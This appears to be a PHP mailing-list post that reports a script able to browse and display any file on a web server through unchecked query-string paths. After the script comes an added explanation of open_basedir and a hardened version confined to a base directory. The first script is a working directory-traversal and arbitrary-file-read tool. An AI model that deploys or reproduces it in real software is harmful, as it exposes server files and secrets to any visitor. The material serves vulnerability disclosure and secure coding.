Hi. I found something that is really dangerous. I hope there is a configuration variable on php.ini that denies what this script does, but if not, PHP Developers must find a way to stop this. The following code allows someone to browse the entire directory tree of a server.

Here is the code:

```php
<?php
// Posted to the list as one run-together line; reflowed here with comments.
// The original relied on register_globals to fill $dir and $file from the
// query string; that is made explicit below so the script behaves the same
// on a server with register_globals off. ereg_replace() (removed in PHP 7)
// is replaced by str_replace() with identical effect. Behaviour is otherwise
// unchanged: any directory or file readable by the web server user is listed
// or displayed, starting from "/".
$url  = "1.php";                                   // this script's own name, used in links
$dir  = isset($_GET['dir'])  ? $_GET['dir']  : null;
$file = isset($_GET['file']) ? $_GET['file'] : null;

if (!isset($file) && !isset($dir)) $dir = "/";     // default: filesystem root
if (isset($dir))  { diretorio($dir); }             // diretorio = list a directory
if (isset($file)) { arquivo($file);  }             // arquivo   = show a file

function diretorio($dir) {
    global $url;
    echo "<b>$dir</b><br>";
    $files = array();
    $i = 0;
    $handle = @opendir($dir);
    // Compare against false so an entry literally named "0" does not end the loop.
    while (($file = @readdir($handle)) !== false) {
        $files[$i++] = $file;
    }
    @closedir($handle);
    for ($refer = 0; $refer < count($files); $refer++) {
        if (@is_dir("$dir/$files[$refer]")) {
            if ($files[$refer] == "..") {
                echo "<a href=\"Javascript:history.back()\">[dir]...<b>$files[$refer]</b></a><br>";
            } else {
                echo "<a href=\"$url?dir=$dir/$files[$refer]\">[dir] <b>$files[$refer]</b></a><br>";
            }
        } else {
            echo "<a href=\"$url?file=$dir/$files[$refer]\">$files[$refer]</a><br>";
        }
    }
}

function arquivo($file) {
    echo "<a href=\"Javascript:history.back()\"><b>Voltar <<</b></a><br>";   // "Voltar" = back
    $logfile = fopen("$file", "r");
    $text = fread($logfile, filesize($file));
    $text = str_replace("\n", "<br>", $text);     // original used ereg_replace()
    echo "$text";
}
?>
```

-- PHP Install Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
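The script above reads whatever path the client supplies, so it is the application, not PHP, that decides which files are exposed. The configuration knob the poster is hoping for does exist: the `open_basedir` directive in php.ini limits every file operation to the directory trees listed in it. The following is an added example, not code from the post, showing the application-level fix: the same browser confined to one fixed base directory, with every user-supplied path canonicalised by `realpath()` and checked for containment before it is listed or read. The base path `/var/www/public-files` is an assumption.

```php
<?php
// Added example (not from the original post): a directory browser that
// confines listing and reading to one fixed base directory.
$base = realpath('/var/www/public-files');   // assumed base directory

// Resolve a user-supplied relative path and confirm it lies inside $base.
// Returns the canonical absolute path, or null if it escapes or does not exist.
function confine($base, $relative) {
    if ($base === false) {
        return null;                          // base itself is missing
    }
    if (strpos($relative, "\0") !== false) {
        return null;                          // NUL bytes are never valid here
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false) {
        return null;                          // does not exist
    }
    // realpath() resolves ".." and symlinks, so a link pointing outside
    // $base fails this prefix test as well.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                          // escaped the base directory
    }
    return $candidate;
}

function list_dir($base, $relative) {
    $path = confine($base, $relative);
    if ($path === null || !is_dir($path)) {
        http_response_code(404);
        return;
    }
    echo '<b>' . htmlspecialchars($relative, ENT_QUOTES, 'UTF-8') . '</b><br>';
    foreach (scandir($path) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;                         // never emit a link to the parent
        }
        $childRel = ltrim($relative . '/' . $entry, '/');
        $isDir    = is_dir($path . DIRECTORY_SEPARATOR . $entry);
        $param    = $isDir ? 'dir' : 'file';
        $label    = $isDir ? '[dir] ' : '';
        // Encode the path for the URL and escape the name for HTML.
        echo '<a href="?' . $param . '=' . rawurlencode($childRel) . '">'
           . $label . htmlspecialchars($entry, ENT_QUOTES, 'UTF-8') . '</a><br>';
    }
}

function show_file($base, $relative) {
    $path = confine($base, $relative);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        return;
    }
    // Escape before output so file contents cannot inject HTML or script.
    echo nl2br(htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8'));
}

if (isset($_GET['file'])) {
    show_file($base, (string) $_GET['file']);
} else {
    list_dir($base, isset($_GET['dir']) ? (string) $_GET['dir'] : '');
}
```

The containment test compares the resolved path against `$base` plus a trailing separator, so a sibling directory whose name merely starts with the base name (`/var/www/public-files-old`) is rejected too. Pair the code with `open_basedir` in php.ini as a second, server-enforced layer: the application check stops traversal in this script, while `open_basedir` bounds any other script on the same host.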